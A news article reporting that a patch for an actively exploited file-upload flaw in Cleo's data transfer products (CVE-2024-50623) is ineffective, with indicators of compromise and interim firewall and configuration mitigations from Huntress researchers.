Transfer software from Cleo: Put behind firewall, patch ineffective

The company Cleo produces data transfer software in which it recently patched a security vulnerability – supposedly. The patch is not enough, the vulnerability is being actively attacked in the wild. Until an effective update is available, IT managers should put Cleo servers behind a firewall to protect them.

The IT security researchers at Huntress explain their observations in a recent blog post. The vulnerability in question is a vulnerability that allows unlimited files in Cleo Harmony, VLTrader and Lexicom prior to versions 5.8.0.21 to be misused to execute malicious code from the network (CVE-2024-50623). In a separate security advisory updated this Tuesday morning, Cleo's developers write that installing the most recently released patch will seal off additional attack vectors for the vulnerability.

IT researchers: Patch ineffective

At around the same time, Huntress published its own analysis on Reddit. According to this, even the patched versions 5.8.0.21 are still vulnerable. An indicator of compromise (Indicator of Compromise, IOC) can be found in the "hosts" subdirectory, for example. The files "main.xml" or "60282967-dc91-40ef-a34c-38e992509c2c.xml" (the file name appeared in several infections) with an embedded Powershell-encoded command are clear indications.

In the blog post, Huntress continues to update the IOCs and add more. A significant increase in compromised servers has been observed since December 8. Using a proof-of-concept exploit, the IT researchers recreated the attacks and found that the current patches are inadequate. In consultation with Cleo, the manufacturer announced that it would provide new patches as soon as possible.

Until then, Huntress recommends reducing the attack surface by preventing part of the attack by changing the configuration. The malicious code is executed through an "autoruns" directory; this can be prevented under "Configure" – "Options" – "Other" by deleting the entry in the "Autorun Directory" field. However, this does not correct the unlimited file upload. Huntress therefore writes: "We strongly recommend putting any Cleo system exposed to the Internet behind a firewall until a new patch has been released." The IOCs also include IP addresses from which the powershell instructions download malicious code.

Data transfer software is very popular with cyber criminals. The potential damage caused by ransomware attacks or ransomware extortion is huge. Last year, for example, the criminal organization cl0p abused security vulnerabilities in MOVEit Transfer from Progress on a large scale to copy sensitive data from hundreds of well-known companies. IT managers should therefore act quickly to avoid falling victim to an attack.

(dmk)